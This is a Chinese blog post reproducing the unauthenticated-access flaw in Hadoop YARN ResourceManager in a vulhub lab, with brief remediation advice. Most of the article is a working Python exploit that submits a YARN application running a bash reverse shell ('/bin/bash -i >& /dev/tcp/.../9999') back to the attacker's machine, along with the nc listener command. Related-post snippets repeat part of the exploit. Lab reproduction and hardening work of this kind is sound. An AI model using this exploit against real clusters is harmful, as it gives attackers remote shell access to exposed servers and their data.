Hadoop未授权访问 getshell——漏洞复现

已于 2023-10-17 14:54:36 修改
阅读量1.1k 收藏 1
点赞数 5
文章标签: linux
于 2023-10-17 10:48:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79441798/article/details/133878919
版权

 Hadoop未授权访问漏洞介绍

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。

靶场搭建

靶机: ubuntu docker IP: 192.168.189.131

攻击机: kali IP: 192.168.189.128

直接使用 vluhub 环境了

 hadoop/unauthorized-yarn目录下终端输入docker-compose up -d启动环境

访问ubuntu靶机的8088端口 http://192.168.189.131:8088 即可看到Hadoop YARN ResourceManager WebUI页面(未授权访问漏洞)

利用过程如下:

在本地监听等待反弹 shell 连接

调用 New Application API 创建 Application

调用 Submit Application API 提交

编写以下exp——python脚本,放在ubuntu的桌面上:
#!/usr/bin/env python

import requests

target = 'http://192.168.189.131:8088/'
lhost = '192.168.189.128' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

kali 打开 nc 监听端口

 nc -nvlp 9999

在 Ubuntu运行脚本exp-python.py 获取shell

python3 exp-python.py

漏洞修复

1、如无必要,关闭 Hadoop Web 管理页面。

2、开启身份验证,防止未经授权用户访问。

3、设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访问包括 50070 以及 WebUI 等相关端口。

Jamey-
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务攻防——数据库安全之授权访问、弱口令
m0_61506558的博客
12-14 527
关于判断服务是否开放进行信息收集的内容,可能通过扫描工具,如果遇到WAF的话,通过常用搭建网站的组件进行尝试,或者通过特定服务提供的报错信息进行判断......由于基于 Erlang 的 JSON 解析器和基于 JavaScript 的 JSON 解析器的差异,在 1.7.0 之前的 Apache CouchDB 和 2.1.1 之前的 2.x 中,可以提交_users具有重复键的文档,roles用于数据库内的访问控制,包括特例_admin角色,表示管理用户。
Hadoop授权访问getshell
Birdman-one的博客
12-11 1571
Hadoop授权访问getshell 一、环境搭建 cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d http://ip:8088/cluster 访问地址出现此页面代表授权访问 二、漏洞复现 exp #!/usr/bin/env python import requests target = 'http://xx.xx.xx.xx:8088/' lhost = 'x.x.x.x' # 把你的本地主机ip放在这里,在9999端口监
二百四十、Hadoop——解决Hadoop 授权访问漏洞
tiantang2renjian的博客
06-24 1105
Hadoop——解决Hadoop 授权访问漏洞
各种授权访问漏洞复现与利用
Shanfenglan's blog
11-30 1174
文章目录1. rsync1.1 利用1. 下载文件2. 上传文件3. 上传文件拿shell2. Jupyter Noteboo2.1 利用3. hadoop3.1 利用4. CouchDB4.1 利用参考文章 1. rsync Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
什么是授权访问漏洞Hadoop & Redis靶场实战——Vulfocus服务攻防
xt350488的博客
06-30 915
Vulfocus是一个便捷的漏洞集成平台,用户只需加载漏洞环境的Docker镜像即可快速使用。它具备一键启动、自动更新flag、计分考核等特性,适用于安全测试和能力评估。平台兼容Vulhub和Vulapps的镜像,支持可视化配置,是安全人员的理想工具。在线位置:https://vulfocus.cn/#/dashboard离线版本:https://github.com/fofapro/vulfocus (即使没有网络也可以在本地进行渗透测试)Tips:docker 部署过程需要科学上网。
hadoop漏洞_浅谈授权漏洞——Hadoop授权
weixin_39865204的博客
12-20 736
0x01 漏洞简介以及危害Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。0x02 漏洞利用环境复现目标靶机:mac osip:192.168.2.85攻击机:kaliip:10...
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3178
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
redis授权访问漏洞复现学习
0nc3的博客
12-14 438
0x00 前言 前段时间看到想复现学习一下,然后就忘了 越临近考试越不想复习 链接:https://xz.aliyun.com/t/6103#toc-53 0x01 常见的授权访问漏洞 Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS授权访问漏洞 VNC 授权访问漏洞 Docker 授权访问漏洞 ...
服务攻防-数据库-cve复现(Mysql cve-2012-2122、redis授权访问漏洞、CouchDB垂直越权漏洞(CVE-2017-12635)、Couchdb 任意命令执行漏洞(CVE-)
m0_74402888的博客
07-20 899
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务。config set dir /var/spool/cron/ //或者 /var/spool/cron/crontabs。
渗透测试——常见服务端口及对应的漏洞汇总
W小哥
11-17 5392
一、web服务类 tomcat--80/8080/8009 manager弱口令(漏洞利用可以上传war包getshell) put上传webshell HTTP慢速攻击 ajr文件包含漏洞-CVE-2020-1938 Jboss--8080 后台弱口令 console后台部署war包 JAVA反序列化 远程代码执行 webSphere--9080
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
Hodoop授权访问修复
07-14
"Hadoop授权访问修复"这个话题聚焦于如何确保Hadoop集群的安全性,防止授权的用户访问敏感信息或进行恶意操作。以下是关于这个问题的详细解释和解决步骤。 首先,Hadoop的默认设置允许所有用户访问其服务接口...
Zookeeper授权访问测试问题
09-29
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。这篇文章主要介绍了Zookeeper授权访问测试,需要的朋友可以参考下
Hadoop面试题(四)——YARN
01-07
1、简述hadoop1与hadoop2 的架构异同   1)加入了yarn解决了资源调度的问题。   2)加入了对zookeeper的支持实现比较可靠的高可用。 2、为什么会产生 yarn,它解决了什么问题,有什么优势?   1)Yarn最主要的功能...
Linux:基础命令学习
qq_55038440的博客
07-20 1459
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
LINUX之MMC子系统分析
gy794627991的博客
07-23 1081
MMC子系统从协议到源码分析
Linux】条件变量及生产者消费者模型
最新发布
2301_78636079的博客
07-23 1107
条件变量与生产消费者模型
hadoop授权访问
10-21
Hadoop授权访问指的是用户在尝试访问Hadoop集群资源时,授权的权限要求被拒绝。这可能是因为用户没有正确的用户名和密码,或者缺乏足够的权限来执行所需的操作。 要解决Hadoop授权访问的问题,可以采取以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值